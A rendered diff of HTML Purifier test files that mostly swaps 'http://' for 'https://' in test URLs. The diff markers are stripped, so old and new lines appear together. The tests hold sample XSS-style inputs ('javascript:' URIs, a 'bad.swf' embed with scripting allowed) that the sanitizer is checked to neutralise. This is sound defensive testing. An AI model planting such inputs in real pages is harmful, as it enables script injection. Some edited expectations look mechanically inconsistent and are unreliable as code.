$this->assertDef('https://www.example.com/', false);
$this->assertDef('url(', false);
$this->assertDef('url("")', true);
$result = 'url("http://www.example.com/")';
$this->assertDef('url(http://www.example.com/)', $result);
$this->assertDef('url("http://www.example.com/")', $result);
$this->assertDef("url('http://www.example.com/')", $result);
$result = 'url("https://www.example.com/")';
$this->assertDef('url(https://www.example.com/)', $result);
$this->assertDef('url("https://www.example.com/")', $result);
$this->assertDef("url('https://www.example.com/')", $result);
$this->assertDef(
' url( "http://www.example.com/" ) ', $result);
$this->assertDef("url(http://www.example.com/foo,bar\)\'\()",
'url("http://www.example.com/foo,bar%29%27%28")');
' url( "https://www.example.com/" ) ', $result);
$this->assertDef("url(https://www.example.com/foo,bar\)\'\()",
'url("https://www.example.com/foo,bar%29%27%28")');
}
}

2
htmlpurifier-4.10.0/tests/HTMLPurifier/AttrDef/URI/HostTest.php
View File

@@ -20,7 +20,7 @@ class HTMLPurifier_AttrDef_URI_HostTest extends HTMLPurifier_AttrDefHarness
$this->assertDef('.test', false);
$this->assertDef('ff');
$this->assertDef('1f'); // per RFC 1123
// See also http://serverfault.com/questions/638260/is-it-valid-for-a-hostname-to-start-with-a-digit
// See also https://serverfault.com/questions/638260/is-it-valid-for-a-hostname-to-start-with-a-digit
$this->assertDef('-f', false);
$this->assertDef('f1');
$this->assertDef('f-', false);

36
htmlpurifier-4.10.0/tests/HTMLPurifier/AttrDef/URITest.php
View File

@@ -14,9 +14,9 @@ class HTMLPurifier_AttrDef_URITest extends HTMLPurifier_AttrDefHarness
public function testIntegration()
{
$this->assertDef('http://www.google.com/');
$this->assertDef('http:', '');
$this->assertDef('http:/foo', '/foo');
$this->assertDef('https://www.google.com/');
$this->assertDef('https:', '');
$this->assertDef('https:/foo', '/foo');
$this->assertDef('javascript:bad_stuff();', false);
$this->assertDef('ftp://www.example.com/');
$this->assertDef('news:rec.alt');
@@ -28,15 +28,15 @@ class HTMLPurifier_AttrDef_URITest extends HTMLPurifier_AttrDefHarness
public function testIntegrationWithPercentEncoder()
{
$this->assertDef(
'http://www.example.com/%56%fc%GJ%5%FC',
'http://www.example.com/V%FC%25GJ%255%FC'
'https://www.example.com/%56%fc%GJ%5%FC',
'https://www.example.com/V%FC%25GJ%255%FC'
);
}
public function testPercentEncoding()
{
$this->assertDef(
'http:colon:mercenary',
'https:colon:mercenary',
'colon%3Amercenary'
);
}
@@ -44,23 +44,23 @@ class HTMLPurifier_AttrDef_URITest extends HTMLPurifier_AttrDefHarness
public function testPercentEncodingPreserve()
{
$this->assertDef(
'http://www.example.com/abcABC123-_.!~*()\''
'https://www.example.com/abcABC123-_.!~*()\''
);
}
public function testEmbeds()
{
$this->def = new HTMLPurifier_AttrDef_URI(true);
$this->assertDef('http://sub.example.com/alas?foo=asd');
$this->assertDef('https://sub.example.com/alas?foo=asd');
$this->assertDef('mailto:foo@example.com', false);
}
public function testConfigMunge()
{
$this->config->set('URI.Munge', 'http://www.google.com/url?q=%s');
$this->config->set('URI.Munge', 'https://www.google.com/url?q=%s');
$this->assertDef(
'http://www.example.com/',
'http://www.google.com/url?q=http%3A%2F%2Fwww.example.com%2F'
'https://www.example.com/',
'https://www.google.com/url?q=http%3A%2F%2Fwww.example.com%2F'
);
$this->assertDef('index.html');
$this->assertDef('javascript:foobar();', false);
@@ -68,17 +68,17 @@ class HTMLPurifier_AttrDef_URITest extends HTMLPurifier_AttrDefHarness
public function testDefaultSchemeRemovedInBlank()
{
$this->assertDef('http:', '');
$this->assertDef('https:', '');
}
public function testDefaultSchemeRemovedInRelativeURI()
{
$this->assertDef('http:/foo/bar', '/foo/bar');
$this->assertDef('https:/foo/bar', '/foo/bar');
}
public function testDefaultSchemeNotRemovedInAbsoluteURI()
{
$this->assertDef('http://example.com/foo/bar');
$this->assertDef('https://example.com/foo/bar');
}
public function testDefaultSchemeNull()
@@ -106,7 +106,7 @@ class HTMLPurifier_AttrDef_URITest extends HTMLPurifier_AttrDefHarness
public function testURIDefinitionValidation()
{
$parser = new HTMLPurifier_URIParser();
$uri = $parser->parse('http://example.com');
$uri = $parser->parse('https://example.com');
$this->config->set('URI.DefinitionID', 'HTMLPurifier_AttrDef_URITest->testURIDefinitionValidation');
generate_mock_once('HTMLPurifier_URIDefinition');
@@ -132,7 +132,7 @@ class HTMLPurifier_AttrDef_URITest extends HTMLPurifier_AttrDefHarness
HTMLPurifier_DefinitionCacheFactory::instance($factory_mock);
$factory_mock->returns('create', $cache_mock);
$this->assertDef('http://example.com');
$this->assertDef('https://example.com');
HTMLPurifier_DefinitionCacheFactory::instance($old);
}
@@ -155,10 +155,10 @@ class HTMLPurifier_AttrDef_URITest extends HTMLPurifier_AttrDefHarness
$this->config->set('URI.HostPolicy', 'DenyAll');
$this->config->set('URI.HostWhitelist', array(null, 'google.com'));
$this->assertDef('http://example.com/fo/google.com', false);
$this->assertDef('https://example.com/fo/google.com', false);
$this->assertDef('server.txt');
$this->assertDef('ftp://www.google.com/?t=a');
$this->assertDef('http://google.com.tricky.spamsite.net', false);
$this->assertDef('https://google.com.tricky.spamsite.net', false);
}
*/

4
htmlpurifier-4.10.0/tests/HTMLPurifier/ErrorCollectorTest.php
View File

@@ -97,7 +97,7 @@ class HTMLPurifier_ErrorCollectorTest extends HTMLPurifier_Harness
$this->context->register('CurrentToken', $current_token);
// 0
$current_token = new HTMLPurifier_Token_Start('a', array('href' => 'http://example.com'), 32);
$current_token = new HTMLPurifier_Token_Start('a', array('href' => 'https://example.com'), 32);
$this->language->returns('formatMessage', 'Token message',
array('message-data-token', array('CurrentToken' => $current_token)));
$this->collector->send(E_NOTICE, 'message-data-token');
@@ -116,7 +116,7 @@ class HTMLPurifier_ErrorCollectorTest extends HTMLPurifier_Harness
$result = array(
0 => array(32, E_NOTICE, 'Token message', array()),
1 => array(32, E_NOTICE, '$CurrentAttr.Name => $CurrentAttr.Value', array()),
2 => array(32, E_NOTICE, 'href => http://example.com', array())
2 => array(32, E_NOTICE, 'href => https://example.com', array())
);
$this->assertIdentical($this->collector->getRaw(), $result);

2
htmlpurifier-4.10.0/tests/HTMLPurifier/Filter/ExtractStyleBlocksTest.php
View File

@@ -253,7 +253,7 @@ text-align:center
public function test_cleanCSS_caseSensitive()
{
$this->assertCleanCSS("a .foo #ID div.cl#foo {\nbackground:url(\"http://foo/BAR\")\n}");
$this->assertCleanCSS("a .foo #ID div.cl#foo {\nbackground:url(\"https://foo/BAR\")\n}");
}
public function test_extractStyleBlocks_backtracking()

8
htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/FormsTest.php
View File

@@ -15,7 +15,7 @@ class HTMLPurifier_HTMLModule_FormsTest extends HTMLPurifier_HTMLModuleHarness
$this->config->set('HTML.Doctype', 'HTML 4.01 Strict');
$this->assertResult( // need support for label for later
'
<form action="http://somesite.com/prog/adduser" method="post">
<form action="https://somesite.com/prog/adduser" method="post">
<p>
<label>First name: </label>
<input type="text" id="firstname" /><br />
@@ -35,7 +35,7 @@ class HTMLPurifier_HTMLModule_FormsTest extends HTMLPurifier_HTMLModuleHarness
{
$this->config->set('HTML.Doctype', 'HTML 4.01 Strict');
$this->assertResult('
<form action="http://somesite.com/prog/component-select" method="post">
<form action="https://somesite.com/prog/component-select" method="post">
<p>
<select multiple="multiple" size="4" name="component-select">
<option selected="selected" value="Component_1_a">Component_1</option>
@@ -56,7 +56,7 @@ class HTMLPurifier_HTMLModule_FormsTest extends HTMLPurifier_HTMLModuleHarness
{
$this->config->set('HTML.Doctype', 'HTML 4.01 Strict');
$this->assertResult('
<form action="http://somesite.com/prog/someprog" method="post">
<form action="https://somesite.com/prog/someprog" method="post">
<p>
<select name="ComOS">
<option selected="selected" label="none" value="none">None</option>
@@ -83,7 +83,7 @@ class HTMLPurifier_HTMLModule_FormsTest extends HTMLPurifier_HTMLModuleHarness
{
$this->config->set('HTML.Doctype', 'HTML 4.01 Strict');
$this->assertResult('
<form action="http://somesite.com/prog/text-read" method="post">
<form action="https://somesite.com/prog/text-read" method="post">
<p>
<textarea name="thetext" rows="20" cols="80">
First line of initial text.

6
htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/NofollowTest.php
View File

@@ -13,15 +13,15 @@ class HTMLPurifier_HTMLModule_NofollowTest extends HTMLPurifier_HTMLModuleHarnes
public function testNofollow()
{
$this->assertResult(
'<a href="http://google.com">x</a><a href="http://google.com" rel="blah">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>',
'<a href="http://google.com" rel="nofollow">x</a><a href="http://google.com" rel="blah nofollow">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>'
'<a href="https://google.com">x</a><a href="https://google.com" rel="blah">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>',
'<a href="https://google.com" rel="nofollow">x</a><a href="https://google.com" rel="blah nofollow">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>'
);
}
public function testNofollowDupe()
{
$this->assertResult(
'<a href="http://google.com" rel="nofollow">x</a><a href="http://google.com" rel="blah nofollow">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>'
'<a href="https://google.com" rel="nofollow">x</a><a href="https://google.com" rel="blah nofollow">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>'
);
}

8
htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/ObjectTest.php
View File

@@ -25,12 +25,12 @@ class HTMLPurifier_HTMLModule_ObjectTest extends HTMLPurifier_HTMLModuleHarness
public function testStandardUseCase()
{
$this->assertResult(
'<object type="video/x-ms-wmv" data="http://domain.com/video.wmv" width="320" height="256">
<param name="src" value="http://domain.com/video.wmv" />
'<object type="video/x-ms-wmv" data="https://domain.com/video.wmv" width="320" height="256">
<param name="src" value="https://domain.com/video.wmv" />
<param name="autostart" value="false" />
<param name="controller" value="true" />
<param name="pluginurl" value="http://www.microsoft.com/Windows/MediaPlayer/" />
<a href="http://www.microsoft.com/Windows/MediaPlayer/">Windows Media player required</a>
<param name="pluginurl" value="https://www.microsoft.com/Windows/MediaPlayer/" />
<a href="https://www.microsoft.com/Windows/MediaPlayer/">Windows Media player required</a>
</object>'
);
}

14
htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/SafeEmbedTest.php
View File

@@ -13,31 +13,31 @@ class HTMLPurifier_HTMLModule_SafeEmbedTest extends HTMLPurifier_HTMLModuleHarne
public function testMinimal()
{
$this->assertResult(
'<embed src="http://www.youtube.com/v/RVtEQxH7PWA&amp;hl=en" />',
'<embed src="http://www.youtube.com/v/RVtEQxH7PWA&amp;hl=en" allowscriptaccess="never" allownetworking="internal" type="application/x-shockwave-flash" />'
'<embed src="https://www.youtube.com/v/RVtEQxH7PWA&amp;hl=en" />',
'<embed src="https://www.youtube.com/v/RVtEQxH7PWA&amp;hl=en" allowscriptaccess="never" allownetworking="internal" type="application/x-shockwave-flash" />'
);
}
public function testYouTube()
{
$this->assertResult(
'<embed src="http://www.youtube.com/v/RVtEQxH7PWA&amp;hl=en" type="application/x-shockwave-flash" width="425" height="344"></embed>',
'<embed src="http://www.youtube.com/v/RVtEQxH7PWA&amp;hl=en" type="application/x-shockwave-flash" width="425" height="344" allowscriptaccess="never" allownetworking="internal" />'
'<embed src="https://www.youtube.com/v/RVtEQxH7PWA&amp;hl=en" type="application/x-shockwave-flash" width="425" height="344"></embed>',
'<embed src="https://www.youtube.com/v/RVtEQxH7PWA&amp;hl=en" type="application/x-shockwave-flash" width="425" height="344" allowscriptaccess="never" allownetworking="internal" />'
);
}
public function testMalicious()
{
$this->assertResult(
'<embed src="http://example.com/bad.swf" type="application/x-shockwave-flash" width="9999999" height="3499994" allowscriptaccess="always" allownetworking="always" />',
'<embed src="http://example.com/bad.swf" type="application/x-shockwave-flash" width="1200" height="1200" allowscriptaccess="never" allownetworking="internal" />'
'<embed src="https://example.com/bad.swf" type="application/x-shockwave-flash" width="9999999" height="3499994" allowscriptaccess="always" allownetworking="always" />',
'<embed src="https://example.com/bad.swf" type="application/x-shockwave-flash" width="1200" height="1200" allowscriptaccess="never" allownetworking="internal" />'
);
}
public function testFull()
{
$this->assertResult(
'<b><embed src="http://www.youtube.com/v/RVtEQxH7PWA&amp;hl=en" type="application/x-shockwave-flash" width="24" height="23" allowscriptaccess="never" allownetworking="internal" wmode="window" /></b>'
'<b><embed src="https://www.youtube.com/v/RVtEQxH7PWA&amp;hl=en" type="application/x-shockwave-flash" width="24" height="23" allowscriptaccess="never" allownetworking="internal" wmode="window" /></b>'
);
}

Some files were not shown because too many files have changed in this diff Show More